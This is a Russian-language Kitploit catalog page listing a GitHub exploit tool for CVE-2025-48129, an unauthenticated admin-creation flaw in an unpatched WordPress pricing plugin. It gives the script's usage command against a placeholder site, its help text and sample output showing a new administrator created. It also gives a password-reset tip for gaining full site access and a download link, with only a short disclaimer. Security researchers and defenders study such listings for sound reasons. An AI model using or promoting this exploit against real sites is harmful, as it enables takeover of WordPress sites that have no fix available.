Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 уязвим для повышения привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-48129
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 уязвим для повышения привилегий

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-48129 - Повышение привилегий в плагине Spreadsheet Price Changer для WordPress

🛡️ Сводка уязвимости

  • Затронутый плагин: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • Уязвимые версии: <= 2.4.37
  • Исправленная версия: ❌ Официального исправления нет
  • Обнаружено: Patchstack | 20 мая 2025
  • CVE ID: CVE-2025-48129
  • Оценка CVSS: 9.8 (Критический)
  • Приоритет исправления: 🔴 Высокий

🔥 Риск

Неаутентифицированные злоумышленники могут повысить привилегии, создав учётную запись администратора без необходимости предварительного доступа. Это позволяет полностью захватить сайт WordPress.

Классифицируется как: OWASP A7 – Ошибки идентификации и аутентификации


🧪 Обзор эксплойт-скрипта

Этот скрипт на Python нацелен на уязвимые версии плагина и регистрирует нового администратора WordPress, используя только email и пароль (хешированный через MD5).


▶️ Пример использования

root@kitploit:~
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 Справка по использованию

root@kitploit:~
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ Пример успешного вывода

root@kitploit:~
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ Важное примечание

В некоторых случаях вход непосредственно с выбранным паролем может не сработать.
Это не ошибка в эксплойте, а результат того, как уязвимый плагин передаёт хешированные пароли во внутреннюю систему создания пользователей WordPress.

Если вам не удаётся войти, просто сбросьте пароль по электронной почте, используя следующий URL:

root@kitploit:~
http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPress отправит письмо для сброса пароля на созданную вами учётную запись администратора, что даст вам полный доступ.


🧾 Правовое заявление

Этот инструмент предоставляется только для образовательных целей и санкционированного тестирования на проникновение.
Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим скриптом.


Автор: Nxploited (Khaled_alenazi)

Скачать инструмент